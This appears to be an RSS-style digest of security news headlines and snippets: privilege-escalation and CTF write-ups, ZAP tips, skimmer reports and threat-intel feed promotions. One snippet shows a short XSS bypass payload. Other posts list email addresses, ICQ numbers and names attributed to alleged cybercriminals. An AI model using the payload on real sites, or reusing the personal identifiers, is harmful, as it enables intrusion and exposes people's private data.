    Note: All notes in this series are on GitHub, where you can read the complete set. The most popular enterprise private code repository is GitLab, and I initially planned to deploy GitLab as the private repository. But after deployment I found that GitLab uses far too many resources; even after optimization it needs 3 GB of memory, so in the end I had to abandon that plan. Then I discovered G…
    Microservices from code to k8s deployment, everything included, series (4): User center - 万俊峰Kevin
    In this series we walk through a complete microservice practice from requirements to launch, from code to k8s deployment, from logging to monitoring. The whole project is developed with go-zero and basically includes go-zero plus some middleware developed by the go-zero author; the tech stack used is essentially go-zero's own components.
    Circular dependencies, part 4: When a circular dependency meets a BeanPostProcessor, love may blossom! - 青石路
    A light moment: The day I learned she had gotten married, I did not sleep all night; I drove 300 kilometers to the foot of her building and slowly smoked a cigarette... The weather was turning cool, firecrackers went off, the wedding procession arrived; she looked beautiful in her wedding dress that day, really beautiful! After I had followed the wedding procession for a few kilometers, I received her message: stop following, stop following, your tractor is too loud... Recap: The author first…
  • Open

    How To Integrate or Query My Public STIX STIX2 TAXII Threat Actor Specific Threat Intelligence Feed In Your Firewall or Security Solution - An Analysis
    Dear blog readers, Did you already pull my public and free STIX STIX2 TAXII threat intelligence feed using your and your organization's Lifetime API Key? In this post I've decided to elaborate more and offer practical advice and links in terms of how you can pull and integrate my daily updated STIX STIX2 TAXII threat intelligence feed in your firewall or security solution and how you can actually use your Lifetime API Key for my feed in Maltego for possible enrichment of your IoCs (Indicators of Compromise). Here's your Lifetime API Key for you and your organization - f8aa0cca-a0ac-4eff-9c03-1c86ad7aee93 Portal: https://ddanchev.ngrok.io API: https://ddanchev.ngrok.io/graphql API Documentation: https://luatix.notion.site/GraphQL-API-cfe267386c66492eb73924ef059d6d59 API Client: https://opencti-client-for-python.readthedocs.io/en/3.3.0/pycti/pycti.html API requirements: https://github.com/amr-cossi/opencti-maltego/blob/master/config.py.sample TAXII Collection: https://ddanchev.ngrok.io/taxii2/root/collections/c2259b20-9c60-4ddd-8931-8de970440f06/objects Bearer Token Authentication Required: https://github.com/OpenCTI-Platform/opencti/issues/1198 Maltego transforms available: - https://www.maltego.com/downloads/ - https://www.maltego.com/transform-hub/opencti/ - https://www.maltego.com/transform-hub/stix/ As always feel free to drop me a line at dancho.danchev@hush.com in case you have any questions. Full list of solutions compatible with STIX STIX2 and TAXII EventLog Analyzer ThreatConnect Azure Sentinel Splunk Cisco Elemendar Cortex XSOAR TrendMicro ArcSight Microsoft Sentinel EventTracker Plixer Scrutinizer Sumo Logic Kaspersky CyberTrace ServiceNow CheckPoint ThreatCloud Carbon Black EDR Cisco Email Gateway ThreatConnect LogPoint Tanium Symantec LogRhythm Infoblox Cloudera Sample screenshots of my STIX STIX2 TAXII Threat Intelligence feed in combination with Maltego: Enjoy!

  • Open

    Inventing Anna, social engineering and OSINT: what is the outlook for the future in terms of security…
    How much personal and intimate information do we disclose on social media spontaneously and carelessly? Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 13
    Thirteen. Unlucky for some. Let’s see how you could solve Hacktoria’s practice challenge: Geolocation 13. I confess I was very excited… Continue reading on Medium »  ( 3 min )
  • Open

    Analysis of CVE-2021-36260: Exploited in the Wild Hikvision Camera Vulnerability
    submitted by /u/chicksdigthelongrun [link] [comments]
    rconn - Consume services behind NAT or firewall without opening ports or port-forwarding
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
    Running Cobalt Strike BOFs from Python
    submitted by /u/naksyn_ [link] [comments]
  • Open

    Interesting Stored XSS
    Hey there! My name is Faizan and this write up is about an interesting Stored XSS I found earlier today! If you know what an XSS aka Cross… Continue reading on Medium »  ( 1 min )
    Give me a browser, I’ll give you a shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »  ( 3 min )
    Burp Suite Tool — Overview and Usage
    Burp Suite is an intercepting tool which can be used to capture and manipulate all of the data traffic between Client and Server. This… Continue reading on Medium »  ( 2 min )
    Send an Email to me and get kicked out of Google Groups !!
    A Feature that almost broke Google Groups !! Continue reading on InfoSec Write-ups »  ( 3 min )
    How I make money with Hacking …
    Hello Everyone, This is Abhishek Kashniyal, I am a CSE student with specialization in Cyber Security & Forensics, a constant learner and… Continue reading on Medium »  ( 2 min )
    BugBounty: Algolia key disclosure vulnerability
    What is Algolia? Continue reading on Medium »  ( 1 min )
  • Open

    A bunch of rock music
    http://djbloom.info/Music/My%20Music/ submitted by /u/CalmWater8439 [link] [comments]  ( 1 min )
    I'm bad at coding. How do I create an Open Directory from scratch?
    Just what the title says. I have some music, movies, documents, etc that I'd like to share, but I don't want to take up or make an entire Google Drive account just for some files. Any help getting started would be greatly appreciated! submitted by /u/Reggie_Smith_89 [link] [comments]  ( 4 min )
  • Open

    I want to know what a day in the life looks like as an infosec analyst. Also, what would companies look for when hiring a junior infosec analyst?
    What would a company look for when hiring junior infosec analysts? I just started as a junior help desk technician and I hear that experience is better than certs. I just want to get an idea of what a company will look for when hiring a junior infosec analyst. Also, is it possible to go from help desk to infosec? submitted by /u/Jkarl0880 [link] [comments]  ( 1 min )
    Any suggestions for gaining resume-worthy experience in cloud security?
    I pivoted from a technical security role to a customer facing technical/management role for a cybersecurity SaaS company a couple years ago. I’ve been considering getting back into the security engineering/architect side of things. One area I’m finding seems to be a requirement for most roles is experience in cloud security like mastery of AWS. I’m also noticing requirements for experience in container tools such as Kubernetes. This isn’t experience I can gain on the job right now. Any suggestions on how I can get experience that matters for these technologies? I don’t want to fall behind and lose any chance of working in a direct security role again. submitted by /u/7heJoker [link] [comments]  ( 1 min )
    SAP CVE-2022-22536 technical analysis?
    Does anybody by some chance have some sources on the new CVE of score 10 impacting SAP NetWeaver? I can't find any details of the specific vulnerable mechanism that allowed the request smuggling. Thanks :) submitted by /u/Altiverses [link] [comments]  ( 1 min )
    What are the prerequisite skills/knowledge for reverse engineering?
    Trying to learn reverse-engineering and binary exploitation and I came across this playlist. Watched a few videos but didn't get a thing; it feels like I'm missing some knowledge gaps in between. Can someone please give me a clear roadmap so that I can start using Radare2? Edit: after radare, I wanna learn Ghidra lol submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    How is your day as an entry-level SOC?
    I have recently interviewed for an entry-level SOC role, and my expectation is a bit mixed. It is a cybersecurity company that provides services such as SIEM monitoring, pen-testing, threat hunting, etc. The X company has 5 people, including the CEO and CTO, and around 300 customers. The role is to sit with the SOC team, check alerts, and then give customers a summary each quarter of what happened within that period. The job title was listed as a cyber security engineer, and the job description mentioned: analysis of security incidents, incident response teams, threat hunting, security advice. During the interview, they asked me two times specifically how I felt about giving security advice to customers. Is it normal that the junior SOC gives security advice to customers? Or is this a good way to get into the "cyber world", then apply for new jobs after 1 year? Going to graduate with my BS this summer, so trying to land a job before I graduate. submitted by /u/PapiPoseidon [link] [comments]  ( 1 min )
  • Open

    The Mischievous Memory Shell: Servlet Memory Shells
    The last article on Servlet memory shells, starting directly from the loading stage.  ( 1 min )
  • Open

    SecWiki News 2022-02-20 Review
    No news has been posted yet today~ For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Telegram vs Cellebrite
    "Telegram for iOS: Access and decode secret chats which can only be accessed on their devices of origin. You can also recover deleted messages." I'm in too deep; this forensic thingy is kinda exciting and I'm in a business major. I guess one can really recover deleted Telegram chats using Cellebrite! Amazing. submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    Apple iCloud Productions
    What kind of data is included in Apple iCloud productions? Do they include permanently deleted files, notes, media? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    Jump from IT Audit into computer forensics
    Hello friends. To make things short, I am an IT Auditor with 1.5 years of experience, and I hate the part of dealing with people in IT Audit, but it's very essential to deal with people there. So I decided to jump to forensics. Do you people deal with humans or simply have to worry about machines and that is it? And, I am CISA certified; will that help? What certification do you suggest taking for computer forensics? And how is the pay for IT Audit vs Computer Forensics? In short, do you recommend the shift or not? Thx submitted by /u/ItchyPilot9804 [link] [comments]  ( 2 min )
  • Open

    [Cullinan #27] Improve cullinan and Added more..
    This is Cullinan log #27. It feels like it has been a while since my last post. Add category cullinan; Add OWASP ZAP; Add Insecure Deserialization; Change SQLMap (Add scanning to X). ZAP and Insecure Deserialization were newly added, and there were some changes on the SQLMap side. ZAP will probably… end up being revised very frequently; the amount of material is just so vast 😵‍💫 I am also adding more features to Cullinan as a whole, and as a first step, categories have now been applied. That's all for now 👋🏼
    Insecure Deserialization
    🔍 Introduction Insecure Deserialization means, literally, deserialization that is not safe. During deserialization, objects the developer never intended can also be deserialized, causing problems in the business logic, or, depending on the conditions, the application can be made to execute code of the attacker's choosing, so the risk is high. First, a look at Serialization/Deserialization: in development, the process of converting an Object in memory into external data such as a file is usually called Serialization, and conversely the process of converting external data such as a file into an Object inside the program is called Deserialization. 🗡 Offensive techniques Detect Without looking at the source code, it is hard to be certain that something is a Deserialization process.
    OWASP ZAP
    Introduction ZAP (Zed Attack Proxy) is an OWASP Flagship project: a security testing tool and vulnerability scanner for Vulnerability Assessment, Penetration Testing, Runtime Testing and Code Review. Along with Burp Suite it is used as a primary tool by security engineers and bug bounty hunters, and since it provides CLI commands, a REST API, a Jenkins plugin, GitHub Actions and so on, it is also widely used as a DAST scanner in DevSecOps, i.e. in the CI/CD pipeline. Personally, it is a project I really love. Whatever else, there is no tool that can compare with its Fuzzer / Scripting. It's the best! Installation You can install it using the installer package for your OS from the URL below.
  • Open

    Self XSS in Create New Workspace Screen
    Mattermost disclosed a bug submitted by rynexxx: https://hackerone.com/reports/1442017 - Bounty: $50
  • Open

    The Red Cross Data Breach Exploited a ManageEngine Vulnerability by APT27
    Article URL: https://www.thecybersecuritytimes.com/the-red-cross-data-breach-exploited-a-manageengine-vulnerability-by-apt27/ Comments URL: https://news.ycombinator.com/item?id=30403952 Points: 1 # Comments: 1  ( 4 min )
  • Open

    Red Team Engagement Planning
    A short article outlining the phases to go through, while planning a red team engagement. Continue reading on Medium »  ( 2 min )

  • Open

    Privilege Escalation Vulnerability in Snapd
    Article URL: https://ubuntu.com/security/notices/USN-4728-1 Comments URL: https://news.ycombinator.com/item?id=30401324 Points: 1 # Comments: 0  ( 2 min )
  • Open

    Printer assigned a drive letter in Windows
    Has anyone else come across a printer that was assigned a drive letter? I’ve never seen this in my personal life but it stood out to me while I was working a case. In this instance, it was a Brother printer assigned to D:. Does doing this provide any additional functionality rather than just printing documents? submitted by /u/ebarboza311 [link] [comments]  ( 1 min )
  • Open

    The ultimate guide to improving your competitive research on Google
    Would you like to improve your queries when researching your competitor or your market? Continue reading on Medium »  ( 3 min )
    Phishing Domain Tool — DnsTwist Part 2
    Dnstwist is an open-source tool used to identify phishing domains, typosquatting domains, attack domains, and brand impersonation. Dnstwist… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 12
    And back again with another Hacktoria Geolocation challenge to solve. I love GEOINT challenges, especially when they force me to learn… Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    "The installation of this device is forbidden by system policy"
    I keep getting these notifications without me trying to install any new device or driver. I would like to know what the source of this is. I tried to look into my event viewer without success. submitted by /u/ak_z [link] [comments]  ( 1 min )
    Small matter: Are Malwarebytes Privacy Guard and Privacy Badger basically doing the same thing? I've had a problem with my browser sticking and it might be conflicting extensions.
    Thank you. submitted by /u/jacobspartan1992 [link] [comments]  ( 1 min )
    Which framework should I learn or at least get familiar with first? (Ghidra, IDA, Radare2)
    Hey Chief, I'm trying to get ahead in reversing binaries, and I really ain't got any idea about which framework I should pick up first. Can you help? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    SOC 2 report
    Why are SOC 2 reports made by CPAs? For SOC 1 I get it, but not SOC 2. How can they audit IT security being accountants? submitted by /u/Xctzn [link] [comments]  ( 2 min )
  • Open

    Windows Privilege Escalation: PrintNightmare
    Introduction Print Spooler has been on researcher’s radar ever since Stuxnet worm used print spooler’s privilege escalation vulnerability to spread through the network in nuclear The post Windows Privilege Escalation: PrintNightmare appeared first on Hacking Articles.  ( 9 min )
  • Open

    SecWiki News 2022-02-19 Review
    No news has been posted yet today~ For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Querying Spotlight APIs With JXA
    TL;DR This blog post takes a brief look at how to use JXA (native JavaScript for Automation on macOS) to query Spotlight APIs. In… Continue reading on Medium »  ( 3 min )
  • Open

    Directory Traversal — what is it?
    Local File inclusion Continue reading on System Weakness »  ( 3 min )
    PORTSWIGGER WEB SECURITY - SSRF (SERVER SIDE REQUEST FORGERY) LAB SOLUTIONS
    If the data used in a web application is retrieved through an external source, and the attacker … the request that the web server has sent… Continue reading on Medium »  ( 7 min )

  • Open

    Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign
    One of the more common infections that we see is site-wide redirects to spam and scam sites, achieved by attackers exploiting newly found vulnerabilities in popular WordPress plugins. If you’ve ever been redirected to a page that looks something like this, then you’ve fallen victim to such an attack: Once the user clicks through the verification process they are sent to a fake CAPTCHA page asking the user to click to prove they are a human: As we have reported in the past on this type of infection: The goal is to trick visitors into clicking “Allow” when the site asks to subscribe to push notifications. Continue reading Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign at Sucuri Blog.
  • Open

    SecWiki News 2022-02-18 Review
    Attacking TCP traffic with IP fragment pollution by ourren; "Red-Blue confrontation exercise scoring system" open-source framework (preview) by ourren; Effectiveness of CSRF defenses in web frameworks by ourren; PRIVGUARD: a data governance framework for GDPR privacy compliance by ourren; Analysis of the NTLM relay "middleman" attack by ourren; The "3 protections, 1 assessment" you must know for cybersecurity work by ourren; For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    How Netsparker can help with AppSec compliance
    Demonstrating web application compliance with various security standards and practices is crucial in many industries. To help you scan applications and prepare reports for common web security compliance requirements, Netsparker by Invicti comes with a host of predefined compliance checks and reports, including OWASP Top 10, PCI DSS, HIPAA, NIST SP 800-53, and more. READ MORE  ( 7 min )

  • Open

    Public STIX STIX2 TAXII Threat Actor Specific Threat Intelligence Feed - Your Lifetime API Key!
    Hi, everyone, This is Dancho. Big news! I've decided to make approximately 15 years of active and unique threat actor specific research publicly accessible online for free using the OpenCTI STIX STIX2 TAXII platform: not only to convert all the cool, juicy, never-published and never-before-discussed niche threat actors, both internationally and in Russia, into a free STIX STIX2 TAXII threat intelligence feed in a machine readable format, but also to centralize and speed up the communication of my research and potentially allow you to catch up, improve your situational awareness and learn new things about the international bad guys, including the bad guys in Russia, their Internet infrastructure, who they are and w…

  • Open

    Adobe Patches Critical RCE Vulnerability in Magento2
    On Sunday, February 13th, Adobe pushed an emergency update to their Magento2 ecommerce software patching a critical unauthenticated remote code execution vulnerability. It is marked as CVE-2022-24086 with a CVSS score of 9.8. Website administrators of Magento stores should patch immediately. Shop owners of Magento 2.3 or 2.4 stores can find the patch to install here. Instructions on how to install Magento security patches via Composer can be found here. Our website firewall generic rules block RCE exploitation attempts by default but given the severity of the vulnerability website administrators should not leave their websites unpatched. Continue reading Adobe Patches Critical RCE Vulnerability in Magento2 at Sucuri Blog.
  • Open

    Windows Privilege Escalation: SpoolFool
    Introduction Oliver Lyak posted a write-up about a Windows Privilege Escalation vulnerability that persisted in Windows systems even after patching of previous vulnerabilities in Print The post Windows Privilege Escalation: SpoolFool appeared first on Hacking Articles.  ( 8 min )

  • Open

    How do I secure WordPress Websites for Free?
    Protecting Content Management Systems (CMS) installed on a hosting server is crucial in today’s ever-growing world wide web, but how do I protect my WordPress website on a tight budget? There are tons of options available on this front, but it can be overwhelming to make the right decision in website protection that fits into your budget. In this article, however, we’ll be covering the basics of efficiently securing your WordPress website at no cost.  Continue reading How do I secure WordPress Websites for Free? at Sucuri Blog.
  • Open

    Horizontall HackTheBox Walkthrough
    Introduction Horizontall is an “easy” rated CTF Linux box on Hack The Box platform. The box covers initial compromise by exploiting Strapi RCE vulnerability and The post Horizontall HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )

  • Open

    Netsparker Enterprise achieves WCAG 2.1 accessibility compliance
    Invicti is proud to break down barriers of access in software. Learn more about how we’ve achieved WCAG 2.1 AA compliance for accessibility standards. READ MORE  ( 3 min )

  • Open

    Who Needs A Niche Threat Actor Specific IoC (Indicator of Compromise) STIX/STIX2/TAXII Feed?
    UPDATE: The feed's official web site including the brochure. Dear blog readers, Who needs access to my STIX/STIX2/TAXII Threat Actor Specific IoC (Indicator of Compromise) feed? Drop me a line today at dancho.danchev@hush.com Stay tuned!

  • Open

    Soon you won't be able to set document.domain in Chrome ⚠️
    Chrome will disable modifying document.domain to relax the same-origin policy. Google recently announced a change in the Chrome browser regarding document.domain. Since the three major browser vendors tend to adopt similar policies, Firefox and Safari will most likely change in a similar way. In summary, from Chrome 106+ onward the setter for document.domain will be removed by default. document.domain Actually, document.domain has some problems. Because document.domain ignores the port number portion of the domain, if services are served from the same domain on different ports, they would normally not be same-origin, but document.
    ZAP's New Networking Stack
    Last Thursday night, simon shared something in the ZAP Developers Group. It was about ZAP's Networking Layer, and as soon as I saw the title I sensed what it was about. (It's something I had really been waiting for 🤩) In the Weekly version, the networking stack has changed! Let's take an early look at what this work was done to improve, what has changed, and where it is going next :D Why? First, little of the Networking stack/layer is actually visible to the user. It is the part that handles networking inside the application, and since ZAP is an old project, the Networking part it was built on used the old Apache Commons HttpClient library.

  • Open

    How to Choose a Security Plugin That’s Right for Your Website
    Finding the perfect security plugin for your website is important, but it’s also crucial you find the proper one that suits your needs. WordPress plugins are a dime a dozen, so we’ll be discussing how to narrow your options and what to look for in a reliable plugin so you can safely install it on your website. Some of the most frequent issues with poorly managed plugins include eating up memory in excess, 500 internal server errors, downtime, white pages, and slow response times. Continue reading How to Choose a Security Plugin That’s Right for Your Website at Sucuri Blog.
  • Open

    AppSec best practices for security that sticks
    In the complex and dynamic world of application security, best practices are your best friends. This post shows how you can build an effective AppSec program based on tried and tested workflows and tools for vulnerability testing and remediation. READ MORE  ( 6 min )

  • Open

    Strengthening ZAP Scanning with Custom Payloads 🚀
    Today I'd like to introduce a ZAP feature I've been looking at with some interest recently: Custom Payloads. Since it lets you test against a specified set of payloads more easily, without using the Fuzzer or ZAP's Scripting engine, I think knowing about it will serve you well in security testing and in building automation. So let's get started :D Custom Payloads Custom Payloads is a feature and Addon that lets ZAP's Active Scan and Passive Scan run against user-specified Payloads. So far 2 categories are available, and because it runs attached to the scans, I expect the benefit of the feature to grow as the number of categories increases.

  • Open

    Top 10 Security Tips to Keep Your WordPress Site Healthy
    As we go through the winter months and weather changes, many of us go to our local pharmacy and take advantage of a flu shot. We do this because maybe we have had the flu before and the second of pain from the jab is nothing in comparison to the hours and days of sickness from catching the flu bug.  As everyone’s grandparents tell them, “An ounce of prevention is worth a pound of cure.” Continue reading Top 10 Security Tips to Keep Your WordPress Site Healthy at Sucuri Blog.

  • Open

    How to Get Rid of the Most Common Types of SEO Spam
    What is SEO Spam? SEO spam is content that attackers inject into a website in an attempt to use your SEO ranking for something that would not rank otherwise, furthering the attackers’ objective. They spam and damage the website while trying to generate revenue or achieve some other goal. Because of this, the website owner is generally completely unaware of what’s going on unless they receive warnings or are added to blocklists. Usually, a hacker will try to avoid being detected by placing links that aren’t visible to the average site visitor and that only crawlers/index engines can see.  Continue reading How to Get Rid of the Most Common Types of SEO Spam at Sucuri Blog.

  • Open

    Linux Privilege Escalation: PwnKit (CVE 2021-4034)
    Introduction Team Qualys discovered a local privilege escalation vulnerability in PolicyKit’s (polkit) setuid tool pkexec which allows low-level users to run commands as privileged users. The post Linux Privilege Escalation: PwnKit (CVE 2021-4034) appeared first on Hacking Articles.  ( 5 min )

  • Open

    Paragraph Separator(U+2029) XSS
    Gareth Heyes shared an interesting XSS trick. If you think carefully about how the browser handles it, it feels like it could be used for bypasses in several forms. It's a simple topic, so let's take a look together 😎 U+2029 XSS #!@*%
alert(1) Normally, if you saw code that looks like the above, you would be sure it could never execute. So shall we copy it and paste it into a browser? ??!?!? Yes, an alert fires. This works because of the special character between $ and alert, the Paragraph Separator, which makes the browser split the input there when it parses it.
    Only developers? No, we need a scratch pad too! Boop!
    I often browse the App Store looking for fun apps. While doing so I found a tool that looked useful for security testing, tried it over this holiday, liked it, and so I'm sharing it on the blog. It's Boop. Boop You can think of Boop as a scratch pad for developers. It's a small editor in which you can easily apply functions such as substitutions while writing/editing code or various kinds of data. The official GitHub introduces it as follows. A scriptable scratchpad for developers. In slow yet steady progress. Pressing CMD+b in Boop brings up the action list

  • Open

    Dancho Danchev's Second Edition of "Cybercrime Forum Data Set for 2022" Available - 113GB Direct Torrent Download Available! Grab a Free Copy Today!
    Here we go. https://academictorrents.com/details/131080b57d568ca3d05794cde5a3d7774f890373 - Dancho Danchev's Research Compilation 2005-2022 - Direct Torrent Download Available! https://academictorrents.com/details/e1b755efb9cb7ec5d5bcea4e60911e2a70a86201 - Dancho Danchev's Cybercrime Forum Data Set for 2022 - Second Edition - Direct Torrent Download Available! https://academictorrents.com/download/131080b57d568ca3d05794cde5a3d7774f890373.torrent - Dancho Danchev's Research Compilation 2005-2022 - Direct Torrent Download Available! https://academictorrents.com/download/e1b755efb9cb7ec5d5bcea4e60911e2a70a86201.torrent - Dancho Danchev's Cybercrime Forum Data Set for 2022 - Second Edition - Direct Torrent Download Available! The compilation is also available here: https://www.kaggle.com/danchodanchev/dancho-danchevs-cybercrime-forum-data-set-torrent Stay tuned!
    Who is Dancho Danchev?
    Folks, Do you remember who I am? Do you need to do a historical check on the security industry including me as an individual, including my personal blog and all the socially-oriented work and contributions that I've made to the industry during the past ten years? If an image is worth a thousand words, consider going through these images which I just found and took photos of, and guess what - brace yourselves for the ultimate reality where I've officially spent over two decades actively working in and researching the security industry. What's my idea in publishing these images? My personal goal and motivation is to make it clear and to ensure that my readers truly know what I've been up to in terms of challenges and all the hard work that I've done and achieved over the past twenty years in the secur…
  • Open

    Domain Persistence: Computer Accounts
    Introduction Often while configuring Active Directories, system admins don’t recognize the harm that comes with allowing a local administrator account on a system assigned to The post Domain Persistence: Computer Accounts appeared first on Hacking Articles.  ( 7 min )

  • Open

    Anubis HackTheBox Walkthrough
    Introduction Anubis is an “insane” level CTF box available on the HackTheBox platform designed by 4ndr34z. The box covers a real-life scenario of initial exploitation The post Anubis HackTheBox Walkthrough appeared first on Hacking Articles.  ( 12 min )
  • Open

    Are all Websites Hackable? Why (not)?
    Frankly, no security is 100% secure. As infections continue to surge across the web, and attackers think of more innovative ways to remain undetected, many site owners wonder if they’ll be the next victim. In this article we’ll discuss what to look out for and consider when managing a website, why these hacks may occur, and how to lock down vulnerabilities. What kind of sites are the most vulnerable? No site is 100% fully secure because sites are managed by people, and people are fallible. Continue reading Are all Websites Hackable? Why (not)? at Sucuri Blog.
  • Open

    How to avoid API blind spots in web application security testing
    APIs are a crucial part of modern web application development and make up a large chunk of your total web attack surface. Learn how Invicti helps organizations make API vulnerability testing an integral part of their secure SDLC. READ MORE  ( 4 min )
  • Open

    A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis
    An image is worth a thousand words. Say no words! Related posts: An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To the Almighty Savior! - An Analysis Dancho Danchev's Disappearance - An Elaboration - Part Two Dancho Danchev's Disappearance 2010 - Official Complaint Against Republic of Bulgaria Dancho Danchev's Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - Part Three Dancho Danchev's Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - Part Two Deep from the Trenches in Bulgaria - Part Three Deep from the Trenches in Bulgaria - Part Two How I Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria A Profile of a Bulgarian Kidnapper – Pavlin Georgiev (Павлин Георгиев/Васил Моев Гачевски/Явор Колев) – An Elaboration on Dancho Danchev’s Disappearance circa 2010 – An Analysis

  • Open

    Exposing FBI's Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and SecondEye Solution - An OSINT Analysis - Maltego Technical Details Video Demonstration
    Google is your best friend! Here's the original analysis. Check out the actual Maltego technical details video demonstration here: Enjoy!

  • Open

    WooCommerce Skimmer Uses Fake Fonts and Favicon to Steal CC Details
    The holidays are always a busy time for ecommerce stores. Dealing with an influx of Christmas shoppers, holiday sales and inventory, shipping, and at times, also hackers. Today’s investigation starts out much like many others, with our client reporting an antivirus warning appearing only on their checkout page, of course at the worst possible time right around the end of December. What first seemed to be a routine case of credit card theft turned out to be a much more interesting infection that leveraged both font, favicon and other less-commonly used files to pilfer credit card details. Continue reading WooCommerce Skimmer Uses Fake Fonts and Favicon to Steal CC Details at Sucuri Blog.
  • Open

    Common authentication and authorization vulnerabilities (and how to avoid them)
    Authentication and authorization are two cornerstones of modern web application security, but there are many ways to get them wrong. Learn how to identify common security defects and avoid vulnerabilities that could allow attackers to access restricted data and functionality by bypassing authentication, authorization, or both. READ MORE  ( 6 min )

  • Open

    Exposing the "InFraud Organization" - An OSINT Analysis - Maltego Technical Details Video Demonstration
    Amazing! Feel like it's 2007 -- check out the slides here including the technical details here which I produced for https://whoisxmlapi.com here including the following Maltego technical details video demonstration video: Enjoy!

  • Open

    Top Ways Websites get Hacked by Spammers
    There’s a lot that goes into a website environment in terms of functionality. Because of this, it’s only natural that one of the most commonly asked questions is how websites usually get hacked. In my previous post I talk about the Most Interesting Vulnerabilities of 2021, which should provide more insight into the more recent hacks seen, or caught beforehand. In this article we’ll be discussing the primary ways websites are infected, and how you can better prevent it from happening.  Continue reading Top Ways Websites get Hacked by Spammers at Sucuri Blog.

  • Open

    Linux Privilege Escalation: Polkit (CVE 2021-3560)
    Introduction According to Red Hat, “Polkit stands for PolicyKit which is a framework that provides an authorization API used by privileged programs.” Pkexec is a The post Linux Privilege Escalation: Polkit (CVE 2021-3560) appeared first on Hacking Articles.  ( 7 min )

  • Open

    The Importance of Responsible Disclosure
    In my years as a security analyst I have worked with many clients who were in very dire straits. A website compromise is never a pleasant experience but there are a number of cases that stick out in my mind as particularly memorable: The ecommerce website owner whose business was on the brink of disaster after having to pay thousands of dollars in fines to Visa due to the presence of a credit card skimmer. Continue reading The Importance of Responsible Disclosure at Sucuri Blog.
  • Open

    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities IM Screen Names - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community IM screen names: aim:goim?screenname=youngglobeman&message=Hello+Are+you+there? aim:goim?screenname=yeezz0r&message=Hello+Are+you+there? aim:goim?screenname=xkyroutx&message=Hello+Are+you+there? aim:goim?screenname=wisie459&message=Hello+Are+you+there? aim:goim?screenname=whailen&message=Hello+Are+you+there? aim:goim?screenname=wgrumpke&message=Hello+Are+you+there? aim:goim?screenname=verbal0g&message=Hello+Are…
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities ICQ UINs - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community ICQ UINs: 999008 9773639 974763 97254007 95211861 92754913 914506 89531566 8923240 86958674 802820 777726 74623265 7444304 690033 6666666 637321 62527577 598629 59838986 56714884 56327073 5556665 517196 48721062 47564547 4545 44203686 41781 3727374 362563 35 348140 33342322 332163 330332251 327539466 320455282 320100851 319326887 31485639 304060 29457002 288687540 288670074 266472842 26633491 264975608 2482045 236790331 230406 222567486 222409185 22063094 219747908 21386767 213201784 212719246 19457815 193200333 1881621 179251032 178954300 178832228 178420526 178210999 178101166 178020075 177541908 177507739 177394922 177016428 176824746 176531816 175688952 175596058 175521773 175350857 175308348 175157730 174902318 174760817 174537112 174511919 174445299 173846049 173838529 173767788 17359522 173387414 173299970 173254582 173019781 173002204 172674035 172476811 172290141 172252866 172021743 171975533 171805992 1715300002 171468368 171440228 170627352 170324565 170036758 169769760 169243371 169220281 169006693 168834059 168769080 168675160 168595955 168495889 168422846 168413916 167927175 167897380 167636937 167023436 166657595 166581197 166407706 165969755 165638624 165546617 164872312 164165878 164008345 162852265 1601617 158807983 15652907 154866004 152616 150860495 139736678 130915854 11402050 1111111 10966997 107021 105233239 103363810 100631 100161 Stay tuned!
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities Personal Email Address Accounts - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community personal email address accounts: shadow@shadowcrew[.]com idline@ziplip[.]com vengeance_1@ziplip[.]com cracker81@ziplip[.]com den5013@ziplip[.]com onthefringe@ziplip[.]com midhack@ziplip[.]com toastypimp@yahoo[.]com fakeid@ziplip[.]com anonraider@hotmail[.]com KsnowyInc@ziplip[.]com spookycat911@ziplip[.]com Necromancer01@ziplip[.]com script4dumps@ukr[.]net dominican@ziplip[.]com rcwizard@ziplip[.]com CAYMAN@Veg…
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities IP Addresses - An OSINT Analysis
